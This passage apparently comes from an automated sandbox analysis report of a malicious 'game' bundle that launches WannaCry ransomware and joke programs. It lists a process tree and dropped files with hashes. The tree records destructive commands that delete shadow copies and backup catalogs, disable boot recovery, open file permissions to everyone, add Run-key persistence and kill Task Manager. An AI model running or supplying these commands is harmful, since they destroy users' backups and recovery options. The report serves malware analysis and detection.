                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /f /im taskmgr.exe
                                                                                                                4⤵
                                                                                                                • Kills process with taskkill
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:928
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /f /im regedit.exe
                                                                                                                4⤵
                                                                                                                • Kills process with taskkill
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2508
                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                                                                                4⤵
                                                                                                                  PID:3056
                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                                                                                  4⤵
                                                                                                                    PID:2256
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /f /im taskmgr.exe
                                                                                                                    4⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1312
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /f /im regedit.exe
                                                                                                                    4⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1192
                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                                                                                    4⤵
                                                                                                                      PID:2340
                                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                                                                                      4⤵
                                                                                                                        PID:1928
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /f /im taskmgr.exe
                                                                                                                        4⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:1532
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /f /im regedit.exe
                                                                                                                        4⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2576
                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                      timeout 5
                                                                                                                      3⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:304
                                                                                                                    • C:\Windows\SysWOW64\shutdown.exe
                                                                                                                      shutdown /a
                                                                                                                      3⤵
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2668
                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                      timeout 2
                                                                                                                      3⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:2452
                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\win7recovery.exe
                                                                                                                      win7recovery.exe
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Adds Run key to start application
                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • System policy modification
                                                                                                                      PID:336
                                                                                                                      • C:\ProgramData\WbVhxCIDDK.exe
                                                                                                                        "C:\ProgramData\WbVhxCIDDK.exe"
                                                                                                                        4⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:1724
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /f /im WScript.exe
                                                                                                                      3⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:1672
                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\wannacryptor.exe
                                                                                                                      wannacryptor.exe
                                                                                                                      3⤵
                                                                                                                      • Drops startup file
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Sets desktop wallpaper using registry
                                                                                                                      PID:2344
                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                        attrib +h .
                                                                                                                        4⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:2220
                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                        icacls . /grant Everyone:F /T /C /Q
                                                                                                                        4⤵
                                                                                                                        • Modifies file permissions
                                                                                                                        PID:1904
                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\taskdl.exe
                                                                                                                        taskdl.exe
                                                                                                                        4⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:2636
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c 19291721044599.bat
                                                                                                                        4⤵
                                                                                                                          PID:2732
                                                                                                                          • C:\Windows\SysWOW64\cscript.exe
                                                                                                                            cscript.exe //nologo m.vbs
                                                                                                                            5⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:2848
                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                          attrib +h +s F:\$RECYCLE
                                                                                                                          4⤵
                                                                                                                          • Views/modifies file attributes
                                                                                                                          PID:2900
                                                                                                                        • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\@[email protected]
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:1340
                                                                                                                          • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\TaskData\Tor\taskhsvc.exe
                                                                                                                            TaskData\Tor\taskhsvc.exe
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:2704
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd.exe /c start /b @[email protected] vs
                                                                                                                          4⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:1868
                                                                                                                          • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\@[email protected]
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:2924
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                                                              6⤵
                                                                                                                                PID:1268
                                                                                                                                • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                  vssadmin delete shadows /all /quiet
                                                                                                                                  7⤵
                                                                                                                                  • Interacts with shadow copies
                                                                                                                                  PID:2804
                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                  wmic shadowcopy delete
                                                                                                                                  7⤵
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:1592
                                                                                                                          • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\@[email protected]
                                                                                                                            4⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Sets desktop wallpaper using registry
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:1812
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "exmpfvgynhzzzhy763" /t REG_SZ /d "\"C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\tasksche.exe\"" /f
                                                                                                                            4⤵
                                                                                                                              PID:1840
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "exmpfvgynhzzzhy763" /t REG_SZ /d "\"C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\tasksche.exe\"" /f
                                                                                                                                5⤵
                                                                                                                                • Adds Run key to start application
                                                                                                                                • Modifies registry key
                                                                                                                                PID:1600
                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                            timeout 12
                                                                                                                            3⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:700
                                                                                                                      • C:\Windows\system32\vssvc.exe
                                                                                                                        C:\Windows\system32\vssvc.exe
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2328

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • Filesize

                                                                                                                        240KB

                                                                                                                        MD5

                                                                                                                        7bf2b57f2a205768755c07f238fb32cc

                                                                                                                        SHA1

                                                                                                                        45356a9dd616ed7161a3b9192e2f318d0ab5ad10

                                                                                                                        SHA256

                                                                                                                        b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

                                                                                                                        SHA512

                                                                                                                        91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

                                                                                                                      • C:\ProgramData\Microsoft\User Account Pictures\@[email protected]

                                                                                                                        Filesize

                                                                                                                        681B

                                                                                                                        MD5

                                                                                                                        2c34625a0684600be7d1868122a4b101

                                                                                                                        SHA1

                                                                                                                        1ff61101c2cdb91efc8712929b62c420bc19895c

                                                                                                                        SHA256

                                                                                                                        a3affe2583925c942755f1f916d92227f42d4dab5b994d8c52f763f9887cad69

                                                                                                                        SHA512

                                                                                                                        9f46be0a9433bafd2e894e7019b4db8f8076db8007e02a5666870e285cf6bdd0d49f7defe32d3962b12f6851467bb1794a1eb9a9f7b7f2c4ba58ff14a9cb5abf

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Adobe_Flash_Player.exe

                                                                                                                        Filesize

                                                                                                                        114B

                                                                                                                        MD5

                                                                                                                        d725d85cc5f30c0f695b03a9e7d0c4c0

                                                                                                                        SHA1

                                                                                                                        131b68adcddb7ff3b3ce9c34c5277eb5d673f610

                                                                                                                        SHA256

                                                                                                                        4d4588c42fa8df0ea45ad48aca4511bb4286f0deaa41fdf188c3b7ab9e1b698a

                                                                                                                        SHA512

                                                                                                                        01f270a15aa10e60e14ac140ccb54e38cf8e57833ef1c0db7d36688a93ecdc0a59ecf9ead9366a5920faac7e28a2e0ee03759eb0fa92d455abc72f406fe8775b

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\19291721044599.bat

                                                                                                                        Filesize

                                                                                                                        412B

                                                                                                                        MD5

                                                                                                                        5808cd0d85ea0035d380c74dbfb5cac5

                                                                                                                        SHA1

                                                                                                                        a9882580073385f13c8abdabe48c8d8b91e3415a

                                                                                                                        SHA256

                                                                                                                        608e4d46189aa03abebde276c2ac8c7f9815a0e619b16ed03464a4b645086a3e

                                                                                                                        SHA512

                                                                                                                        2ac30b00729e851200170e6bd451ac94206392932c4170eb5946e9fcccc09d1c841380754e3aea3adb4eec1520d81241e5e8a66130630d172a8b8504714e2eaa

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\@[email protected]

                                                                                                                        Filesize

                                                                                                                        933B

                                                                                                                        MD5

                                                                                                                        f97d2e6f8d820dbd3b66f21137de4f09

                                                                                                                        SHA1

                                                                                                                        596799b75b5d60aa9cd45646f68e9c0bd06df252

                                                                                                                        SHA256

                                                                                                                        0e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a

                                                                                                                        SHA512

                                                                                                                        efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\FloweyTransparent.png

                                                                                                                        Filesize

                                                                                                                        141KB

                                                                                                                        MD5

                                                                                                                        0ec81a06032a4af610a1115b78f0b538

                                                                                                                        SHA1

                                                                                                                        9ff2a355bb20e7fd64720b1442019025737c6314

                                                                                                                        SHA256

                                                                                                                        9912414319474c62a7d906b5c5f41627d0d8a0c84c2d4ec198bef720fa62bb8f

                                                                                                                        SHA512

                                                                                                                        a6374105aa1edafe32c90d830e989cd16dddb98190234c4a936148b76cfc11038415d33477eaac821f2ef23c9f36539b9b6e38ac7573bf016f382fd611b59e8d

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\IMPORTANT.txt

                                                                                                                        Filesize

                                                                                                                        273B

                                                                                                                        MD5

                                                                                                                        c538506cae8330844fd21a05f2d065aa

                                                                                                                        SHA1

                                                                                                                        02534de70d8ac6b5b700456a6f90b8f3b72b3cc0

                                                                                                                        SHA256

                                                                                                                        20cd2cf85675a5cfdcba4d355df959d71a9e1944888a7ecea7e3f7a16e8adbf9

                                                                                                                        SHA512

                                                                                                                        a2d8070c569d4e4091adc85d570603b0400aedac3da2fd3e18ee588d72b12f1183d27f205ada0fb74e004e89415274fa27e84574f498e2315132c91495fae123

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\Interop.ShockwaveFlashObjects.dll

                                                                                                                        Filesize

                                                                                                                        21KB

                                                                                                                        MD5

                                                                                                                        e869d1d4545c212d9068a090a370ded3

                                                                                                                        SHA1

                                                                                                                        a6a92f108bba390cd14e7103ba710efec1d270f9

                                                                                                                        SHA256

                                                                                                                        63af704211a03f6ff6530ebfca095b6c97636ab66e5a6de80d167b19c3c30c66

                                                                                                                        SHA512

                                                                                                                        ee108b0ebefb476c5beb568129da7ce058229fb42ad3500c6fc37a36d718eb67a17b331d73f6920a5290c3977be2eda96aa057533c3344898d161cb464c6ef76

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\TaskData\Tor\taskhsvc.exe

                                                                                                                        Filesize

                                                                                                                        3.0MB

                                                                                                                        MD5

                                                                                                                        fe7eb54691ad6e6af77f8a9a0b6de26d

                                                                                                                        SHA1

                                                                                                                        53912d33bec3375153b7e4e68b78d66dab62671a

                                                                                                                        SHA256

                                                                                                                        e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

                                                                                                                        SHA512

                                                                                                                        8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\YFGA.bat

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        643e1d4c3154c5dfe77e8c1f57e852a9

                                                                                                                        SHA1

                                                                                                                        719edadfa7323f4ed46f3a134485a4055017a040

                                                                                                                        SHA256

                                                                                                                        5675fb3256470cec0a9b5e1ca63aac7331803e3a31c2cc6d8d62a17687335378

                                                                                                                        SHA512

                                                                                                                        71ef9cf544459baa80e4a396ce7bcfabb8a6dc23076c861cca35180b9235590f29239eb964a4c374a99870c6f99db6aea946713332558a41c2903e4072ef66c6

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\YouAreAnIdiot.exe

                                                                                                                        Filesize

                                                                                                                        424KB

                                                                                                                        MD5

                                                                                                                        e263c5b306480143855655233f76dc5a

                                                                                                                        SHA1

                                                                                                                        e7dcd6c23c72209ee5aa0890372de1ce52045815

                                                                                                                        SHA256

                                                                                                                        1f69810b8fe71e30a8738278adf09dd982f7de0ab9891d296ce7ea61b3fa4f69

                                                                                                                        SHA512

                                                                                                                        e95981eae02d0a8bf44493c64cca8b7e50023332e91d75164735a1d0e38138f358100c93633ff3a0652e1c12a5155cba77d81e01027422d7d5f71000eafb4113

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs

                                                                                                                        Filesize

                                                                                                                        50B

                                                                                                                        MD5

                                                                                                                        3167d161336cbd296dc579d2295b0f22

                                                                                                                        SHA1

                                                                                                                        53253e5841e6a7a7a1b8bd08378af0a96b2f9a98

                                                                                                                        SHA256

                                                                                                                        307879bf0d9bec07bab240b5010434801fbee520c99c5a617e8ac630f42dde80

                                                                                                                        SHA512

                                                                                                                        62af8fa0c9a30ec6aa9b552fcac1879af1f00f5ceb48a77718b2a8e042e3524e2cd299f26fcde31ad8abf2dcb94d15cf45ecbce0bd5f9f93f44aca6327aa53ea

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs

                                                                                                                        Filesize

                                                                                                                        44B

                                                                                                                        MD5

                                                                                                                        9a2ccbd3e2f1a2382fed7674c28dd086

                                                                                                                        SHA1

                                                                                                                        b466bdd2079575c938de65285f02739143ecb170

                                                                                                                        SHA256

                                                                                                                        4519cd5997afce27129ef943f121972f7b0b34aa018e4dd408892fc5c39bb59e

                                                                                                                        SHA512

                                                                                                                        8929493211c17a8e99b908a8305dbebe2d96e1b54426e89ddba84c2010a86d7f6d0983080f29fa1ab7a0687d536c0546278b9fffe4560d84e4012f243f344d78

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy3.vbs

                                                                                                                        Filesize

                                                                                                                        56B

                                                                                                                        MD5

                                                                                                                        19cf22e8d63e787913b6617542211e19

                                                                                                                        SHA1

                                                                                                                        8c3d2f43025e5c4ef70e0c4d1f36692361f51b1f

                                                                                                                        SHA256

                                                                                                                        dbec312d736f8a56f94ace99986d95d4355ef644a2fd908da1ff4c8b0a003979

                                                                                                                        SHA512

                                                                                                                        8b9d192dd7f175e63aebcdfc8426876fa8bf3ae00d3cf10bb8fcf0d0c262b906de28784f5b97141f656e87bb548d343b8d5a127c06ecb407289e91f3fc199608

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\b.wnry

                                                                                                                        Filesize

                                                                                                                        1.4MB

                                                                                                                        MD5

                                                                                                                        c17170262312f3be7027bc2ca825bf0c

                                                                                                                        SHA1

                                                                                                                        f19eceda82973239a1fdc5826bce7691e5dcb4fb

                                                                                                                        SHA256

                                                                                                                        d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

                                                                                                                        SHA512

                                                                                                                        c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\bloatware\OperaSetup.exe

                                                                                                                        Filesize

                                                                                                                        2.0MB

                                                                                                                        MD5

                                                                                                                        2d183522f195d563fe2a732363b8f757

                                                                                                                        SHA1

                                                                                                                        8b4ba6716e8e635b2b35ee64134784c788fa1b0e

                                                                                                                        SHA256

                                                                                                                        4b6d2615f53454076b996a91473287e5fc882ce266933cfbe815a63477ed8407

                                                                                                                        SHA512

                                                                                                                        2c37e38214ed90d21345a8675424cfe3086cce34acd19972081479946c541b747b97cc722910189f9b5e7e8bcd56de0b2326407b3008de6763c40366ceffc67b

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\bloatware\bewidgets.exe

                                                                                                                        Filesize

                                                                                                                        843KB

                                                                                                                        MD5

                                                                                                                        ff508ab78289efa35e67a05d6cc20717

                                                                                                                        SHA1

                                                                                                                        174f616661b53371fe93fa5cc4ec4b6e233abb43

                                                                                                                        SHA256

                                                                                                                        eca41ee73faaa7e85ecf4d4c6d4df0e078c36c6554f25142b5e68b2b6cf68272

                                                                                                                        SHA512

                                                                                                                        f94fd558e34589c8b0f3da7d20bbb404c4dc6e560aabc5f7e702cdf6a6b8a7870d63d8fb667f6324461ed37c32f6ff8abb0cee65317c6ad745e61c1fc7c80811

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\bloatware\bloatware.cmd

                                                                                                                        Filesize

                                                                                                                        140B

                                                                                                                        MD5

                                                                                                                        85960c66edf9a8db4e5a17d9f15b6ae3

                                                                                                                        SHA1

                                                                                                                        fb27f19a4e8f55dc2c77d7570d472e8df801531b

                                                                                                                        SHA256

                                                                                                                        81a20f21135c05252a3dd2042ff39bf044624c79f6d9ec9fd412a8c9b38d83a3

                                                                                                                        SHA512

                                                                                                                        c8b81cb4901039c5ac26bbf2e98b40db60bfd6ab37d7abbc030d1ba11f78485a148935539c09c2cb5c983f14d66b0fdd9d49c138a1340690b2aa69de35d4975f

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\bloatware\fontcreator.exe

                                                                                                                        Filesize

                                                                                                                        25.2MB

                                                                                                                        MD5

                                                                                                                        14cebb6187a53864094293d616e9af4d

                                                                                                                        SHA1

                                                                                                                        47b89d897f432002520fb4a9c0c862df45257d36

                                                                                                                        SHA256

                                                                                                                        1e3cf9b81993ca63c3da99c4ec29d8826d5ac65be4088b4e4fd52f11224be96c

                                                                                                                        SHA512

                                                                                                                        f4bc7cb3f602ac686485ee5b23a856b49ce3e3b73325cc520a728a723d014785f2091905f676312ee7826740f184b074458a31018d3c7d27a6ce2a219643195a

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\bloatware\iconchanger.exe

                                                                                                                        Filesize

                                                                                                                        1.1MB

                                                                                                                        MD5

                                                                                                                        3b89914c7bfe5487af38f7bd8dc31bb5

                                                                                                                        SHA1

                                                                                                                        7204cce974e02495f58731e961e4cdc49a2f1ef3

                                                                                                                        SHA256

                                                                                                                        14068d0948dfeedc5908573fcaa2704536faa8b0fbea8caac61b9fb264cc204d

                                                                                                                        SHA512

                                                                                                                        73735b965a0c948a4126bad31ea54fb4aa31b2c8877ab772f7596a27e821be9f6bba17ddbb9f4e87c6c70bba93375277008e4fa354bf1504e1cd2b9b190d45f8

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\bloatware\pixelsee.exe

                                                                                                                        Filesize

                                                                                                                        4.8MB

                                                                                                                        MD5

                                                                                                                        39490d6ae5b10a8cdffecd71d05141dd

                                                                                                                        SHA1

                                                                                                                        450da6260c6817aca8d9444831a48439ba45785c

                                                                                                                        SHA256

                                                                                                                        a9427d47bf1cfadd009990ca09feb2af88823f5908b17e2afa70c8c49c95b3eb

                                                                                                                        SHA512

                                                                                                                        7ffb9cb6a53cf233b6ff396eeb6193e683aed75001b3f73a1bbadaeec3ff7dcbce9b7e215d1743a4374e488185b824b90dde4afe93a8d93608b6340af07c14fb

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\bloatware\qtranslate.exe

                                                                                                                        Filesize

                                                                                                                        908KB

                                                                                                                        MD5

                                                                                                                        e23ffecb44c814aaa4708d56ab5b144b

                                                                                                                        SHA1

                                                                                                                        202311d615685e7baaa41dc149b5a76a69c05a0e

                                                                                                                        SHA256

                                                                                                                        d395af3c10e18c944cf8ade76a650623dc23e050eaf652ff31056c84077a013c

                                                                                                                        SHA512

                                                                                                                        4ae915fb4cb00e30a215ddd439c6e254fb49ce15c4d53000fb12a0cbf5f68820bc7dca6b840a620351060101c6995fd9429ea91f9682503f01ec001f213cfdc3

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\c.wnry

                                                                                                                        Filesize

                                                                                                                        780B

                                                                                                                        MD5

                                                                                                                        383a85eab6ecda319bfddd82416fc6c2

                                                                                                                        SHA1

                                                                                                                        2a9324e1d02c3e41582bf5370043d8afeb02ba6f

                                                                                                                        SHA256

                                                                                                                        079ce1041cbffe18ff62a2b4a33711eda40f680d0b1d3b551db47e39a6390b21

                                                                                                                        SHA512

                                                                                                                        c661e0b3c175d31b365362e52d7b152267a15d59517a4bcc493329be20b23d0e4eb62d1ba80bb96447eeaf91a6901f4b34bf173b4ab6f90d4111ea97c87c1252

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\china.png

                                                                                                                        Filesize

                                                                                                                        68KB

                                                                                                                        MD5

                                                                                                                        732dabce85a07f8c14199ab45ff7a438

                                                                                                                        SHA1

                                                                                                                        576d530078f6aeaf824748e7c9948930760646c4

                                                                                                                        SHA256

                                                                                                                        db58369e888f471c8ac8ec1580ac96003788b7bf249ab02fae6d5160a2affdc3

                                                                                                                        SHA512

                                                                                                                        f6963ac6f6c586ec76c00068de3145dd351f7e5b52b6733a00a46327c43a1ec34b6daa7a93cf2315cfb4a6048877bbcdc12c77b694d60f7196d75dd5ddf54e2d

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\flasher.exe

                                                                                                                        Filesize

                                                                                                                        246KB

                                                                                                                        MD5

                                                                                                                        9254ca1da9ff8ad492ca5fa06ca181c6

                                                                                                                        SHA1

                                                                                                                        70fa62e6232eae52467d29cf1c1dacb8a7aeab90

                                                                                                                        SHA256

                                                                                                                        30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6

                                                                                                                        SHA512

                                                                                                                        a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\flowey.jpg

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        901e58fabfe9d70b980d1ce616dbd442

                                                                                                                        SHA1

                                                                                                                        b40e3d61537b9599731e55f5c529d31474794372

                                                                                                                        SHA256

                                                                                                                        4adb074b763ae378b34a673226fc26191c0793b56295877aba5f625eaf6cc0fb

                                                                                                                        SHA512

                                                                                                                        e096c5e6adea8ba5941e1cc128413ffec47ca615fe9f2346afe45aaf8e14cac585b491153ea5b30b1f876c20ac5d087308a06083f437af3b5cbb815362f6dc9b

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\hydra.cmd

                                                                                                                        Filesize

                                                                                                                        47B

                                                                                                                        MD5

                                                                                                                        5e578014c7017a85ca32f0b7e5d7df7f

                                                                                                                        SHA1

                                                                                                                        c88d8e7179fcc070d4419be9f4d8647354c2f6ed

                                                                                                                        SHA256

                                                                                                                        a964a717e3c47cb7d274e98928ca1271377d0d76a8908448e1b70e63af4082ad

                                                                                                                        SHA512

                                                                                                                        7eb206b0cbc2a9b744246d8a83b2fccc70204c6e777b0fcbb838e63d477fe047d8827f3c0de823d55b9ab5cba2ab572ff3f543f76a3451fa81b31584cc767106

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\jokewarehydra.exe

                                                                                                                        Filesize

                                                                                                                        43KB

                                                                                                                        MD5

                                                                                                                        b2eca909a91e1946457a0b36eaf90930

                                                                                                                        SHA1

                                                                                                                        3200c4e4d0d4ece2b2aadb6939be59b91954bcfa

                                                                                                                        SHA256

                                                                                                                        0b6c0af51cde971b3e5f8aa204f8205418ab8c180b79a5ac1c11a6e0676f0f7c

                                                                                                                        SHA512

                                                                                                                        607d20e4a46932c7f4d9609ef9451e2303cd79e7c4778fe03f444e7dc800d6de7537fd2648c7c476b9f098588dc447e8c39d8b21cd528d002dfa513a19c6ebbf

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\msg\m_finnish.wnry

                                                                                                                        Filesize

                                                                                                                        37KB

                                                                                                                        MD5

                                                                                                                        35c2f97eea8819b1caebd23fee732d8f

                                                                                                                        SHA1

                                                                                                                        e354d1cc43d6a39d9732adea5d3b0f57284255d2

                                                                                                                        SHA256

                                                                                                                        1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

                                                                                                                        SHA512

